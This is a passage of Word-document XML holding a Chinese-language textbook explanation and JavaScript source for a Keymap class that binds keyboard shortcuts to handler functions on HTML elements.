        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>通过给</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>install()</w:t>
      </w:r>
      <w:r>
        <w:t>方法传入像</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>对象这样的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素，然后就可以使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*install()</w:t>
      </w:r>
      <w:r>
        <w:t>方法给指定的对象添加</w:t>
      </w:r>
      <w:r>
        <w:t>onkeydown</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>当调用这个处理程序时，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它判断按下键的按键标识符，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果有这个按键标识符的任何绑定，就调用对应的处理程序函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap</w:t>
      </w:r>
      <w:r>
        <w:t>可以在多个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素上配置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>按键标识符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>按键标识符是一个区分大小写的字符串，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它表示按键加上同一时刻按下的辅助键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>按键的名字通常是按键上的字符（不会变）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>法定的键名包括</w:t>
      </w:r>
      <w:r>
        <w:t>"A"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>7"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"F2"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"PageUp"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Left"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Backspace"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"Esc"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>请参阅模块的</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap.keyCodeToKeyName</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的键名列表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这里有</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>规范定义的键名子集，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>并且当实现时这个类将使用事件对象的</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>按键标识符也可能包含辅助键前缀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这些前缀是</w:t>
      </w:r>
      <w:r>
        <w:t>Alt</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Ctrl</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Meta</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Shift</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它们区分大小写，且必须使用空格、下划线、连字符或</w:t>
      </w:r>
      <w:r>
        <w:t>"+"</w:t>
      </w:r>
      <w:r>
        <w:t>来和按键名或彼此分开</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:t>"SHIFT+A"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Alt_F2"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"meta-v"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"ctrl alt </w:t>
      </w:r>
      <w:r>
        <w:t>left"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>Meta</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Commnad</w:t>
      </w:r>
      <w:r>
        <w:t>键，</w:t>
      </w:r>
      <w:r>
        <w:t>Alt</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>一些浏览器把</w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t>键映射到</w:t>
      </w:r>
      <w:r>
        <w:t>Meta</w:t>
      </w:r>
      <w:r>
        <w:t>辅助键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序在配置</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap</w:t>
      </w:r>
      <w:r>
        <w:t>的文档或文档元素上作为其方法调用，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>并传入两个参数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*1)keydown</w:t>
      </w:r>
      <w:r>
        <w:t>事件的事件对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*2)</w:t>
      </w:r>
      <w:r>
        <w:t>按下的按键的标识符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序的返回值就是</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序的返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果处理程序函数返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*Keymap</w:t>
      </w:r>
      <w:r>
        <w:t>将停止冒泡并取消和</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>事件相关的默认操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>限制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>在所有按键上绑定一个事件处理函数是不可</w:t>
      </w:r>
      <w:r>
        <w:t>能的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>操作系统会限制一些按键序列（例如，</w:t>
      </w:r>
      <w:r>
        <w:t>Alt+F4</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>而浏览器本身也可能限制其他一些按键序列（比如：</w:t>
      </w:r>
      <w:r>
        <w:t>Ctrl+S</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这些代码受限于浏览器、</w:t>
      </w:r>
      <w:r>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:t>和本地设置。功能键和有辅助键的功能键工作得很好，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>而没有辅助键的字母数字键也工作得很好</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*Ctrl</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Alt</w:t>
      </w:r>
      <w:r>
        <w:t>与字母键盘键的结合非常强健</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>在美国标准键盘布局上，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>能够支持大多数不需要</w:t>
      </w:r>
      <w:r>
        <w:t>Shift</w:t>
      </w:r>
      <w:r>
        <w:t>键的标点字符（</w:t>
      </w:r>
      <w:r>
        <w:t>=[];',./\</w:t>
      </w:r>
      <w:r>
        <w:t>但不包括连字符）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>但是它们不特别适合其他键盘布局，应该避免</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这是构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
        <w:t>Keymap(bindings){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.map={};//</w:t>
      </w:r>
      <w:r>
        <w:t>定义按键标识符</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>＞处理程序映射</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(bindings){//</w:t>
      </w:r>
      <w:r>
        <w:t>给它复制初始绑定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(name in bindings)this.bind(name,bindings[name]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>绑定指定的按键标识符和指定的处理程序函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Keymap.prototype.bind=function(key,func){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.map[Keymap.normalize(key)]=func;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>删除指定按键标识符的绑定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Keymap.</w:t>
      </w:r>
      <w:r>
        <w:t>prototype.unbind=function(key){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete this.map[Keymap.normalize(key)];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>在指定</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素上配置</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Keymap.prototype.install=function(element){//</w:t>
      </w:r>
      <w:r>
        <w:t>这是事件处理程序函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var keymap=this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function handler(event){return keymap.dispatch(event,element);}//</w:t>
      </w:r>
      <w:r>
        <w:t>现在安装它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(element.addEve</w:t>
      </w:r>
      <w:r>
        <w:t>ntListener)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>element.addEventListener("keydown",handler,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(element.attachEvent)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>element.attachEvent("onkeydown",handler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>这个方法基于</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap</w:t>
      </w:r>
      <w:r>
        <w:t>绑定分派按键事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Keymap.prototype.dispatch=function(event,element){//</w:t>
      </w:r>
      <w:r>
        <w:t>开始没有辅助键和键名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var modifiers=""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>keyname=null;//</w:t>
      </w:r>
      <w:r>
        <w:t>按照标准的小写字母顺序构建辅助键字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(event.altKey)modifiers+="alt_";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(event.ctrlKey)modifiers+="ctrl_";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(event.metaKey)modifiers+="meta_";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(event.shiftKey)modifiers+="shift_";//</w:t>
      </w:r>
      <w:r>
        <w:t>如果实现</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>规范的</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>属性，获取</w:t>
      </w:r>
      <w:r>
        <w:t>keyname</w:t>
      </w:r>
      <w:r>
        <w:t>很容易</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(event.key)keyname=event.key;//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>上用</w:t>
      </w:r>
      <w:r>
        <w:t>keyIdentifier</w:t>
      </w:r>
      <w:r>
        <w:t>获取功能键键名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(event.keyIdentifier</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>event.keyIdentifier.substring(0,2)!=="U+")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>keyname=event.keyIdentifier;//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，使用</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>属性和后面编码到键名的映射</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else keyname=Keymap.keyCodeToKeyName[event.keyCode];//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不能找出键名，只能返回并忽略这个事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!keyname)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>标准的按键</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>是辅助键加上小写的键名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var keyid=modifiers+keyname.toLowerCase();//</w:t>
      </w:r>
      <w:r>
        <w:t>现在查看按键标识符是否绑定了任何东西</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var handler=this.map[keyid];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(handler){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果这个键有处理程序，调用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>调用处理程序函数</w:t>
      </w:r>
